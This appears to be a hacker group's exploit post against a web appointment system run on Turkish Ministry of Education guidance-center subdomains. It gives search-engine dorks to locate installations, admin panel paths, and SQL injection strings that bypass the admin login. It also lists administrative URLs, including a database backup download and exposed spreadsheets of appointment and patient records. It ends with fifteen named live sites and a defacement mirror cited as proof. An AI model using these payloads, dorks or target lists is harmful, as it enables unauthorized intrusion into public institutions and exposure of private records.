MAHAKAL S3NA -------------------------------MAHAKAL S3NA# Google Dork :

1. MAHAKAL S3NA -------------------------------MAHAKAL S3NA
2.  
3.  
4. # Google Dork :
5. intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr
6. inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr
7. inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr
8.  
9. # Admin Panel Login Path :
10.  
11. /randevu/admin/
12. /onlinerandevu/admin/
13.  
14. # Authentication Bypass Exploit :
15.  
16. Admin Username :
17.  
18. anything' OR 'x'='x
19.  
20. Admin Password :
21.  
22. anything' OR 'x'='x
23.  
24. You can try also this, too.
25.  
26. 1' or 1=1 -- -
27. 1' or 1=1 -- -
28.  
29. '=''or'
30. '=''or'
31.  
32. # Useable Admin Control Panel URL Links Exploits =>
33.  
34. /randevu/admin/index.php
35. /randevu/admin/index3.php
36. /randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download
37. /admin/randevu.xls
38. /onlinerandevu/admin/hasta.xls
39. /randevu/admin/sifre.php
40. /randevu/admin/resetle.php
41. /randevu/admin/index4.php
42. /randevu/admin/ogretmen.php
43. /randevu/admin/karar.php
44. /randevu/admin/egitsel.php
45. /randevu/admin/test.php
46. /randevu/admin/sebeb.php
47. /randevu/admin/tani.php
48. /randevu/admin/destek.php
49. /randevu/admin/oneri.php
50. /randevu/admin/index1.php
51. /randevu/admin/dr.php
52. /randevu/admin/saat.php
53. /randevu/admin/basvuru.php
54. /randevu/admin/sart.php
55. /randevu/admin/hastalik.php
56. /randevu/admin/site.php
57. /randevu/admin/ilce.php
58. /randevu/admin/okul.php
59. /randevu/admin/kademe.php
60. /randevu/admin/tatil.php
61. /randevu/admin/index5.php
62. /randevu/admin/randevu.php
63. /randevu/admin/liste.php
64. /randevu/admin/page1.php
65. /randevu/admin/rapor.php
66. /admin/admin.php?islem=randevu&randevu=listele
67. /admin/admin.php?islem=ogretmen
68. /admin/admin.php?islem=kullanici
69. /randevu/admin/admin.php?islem=tarih
70. /randevu/admin/admin.php?islem=saat
71. /randevu/admin/admin.php?islem=okul
72. /randevu/admin/admin.php?islem=randevu&randevu=dokum_ver
73. /randevu/admin/admin.php?islem=randevu&randevu=arsiv
74. /randevu/admin/admin.php?islem=randevu&randevu=reddedilen
75. /randevu/admin/admin.php?islem=randevu&randevu=rezerve
76.  
77. # Directory Paths =>
78.  
79. /randevu/index.php?sayfa=iletisim
80. /randevu/index.php?sayfa=iptal
81. /randevu/index.php?sayfa=sorgu
82. /randevu/index.php?sayfa=rapor
83. /randevu/index.php?sayfa=%F6gretmen%20giri%FEi
84.  
85. ##########################################################################################################
86.  
87. Example Vulnerable Sites *.subdomains of meb.gov.tr =>
88.  
89. bucaram.meb.gov.tr/randevu/admin/ => [ Proof of Concept ] => zone-h.org/mirror/id/31762392
90. randevu.atombilgisayar.com.tr/admin/
91. fatsaram.meb.gov.tr/randevu/admin/
92. adiyamanram.meb.gov.tr/randevu/admin/
93. tavsanliram.meb.gov.tr/randevu/admin/
94. sokeram.meb.gov.tr/randevu/admin/
95. sancakteperam.meb.gov.tr/randevu/admin/
96. pendikram.meb.gov.tr/randevu/admin/
97. kilisram.meb.gov.tr/randevu/admin/
98. kcekmeceram.meb.gov.tr/randevu/admin/
99. esenlerram.meb.gov.tr/randevu/admin/
100. bakirkoyram.meb.gov.tr/randevu/admin/
101. bahcelievlerram.meb.gov.tr/randevu/admin/
102. arnavutkoyram.meb.gov.tr/randevu/admin/
103. boluram.meb.gov.tr/randevu/admin/
104.  
105. #################################################################################################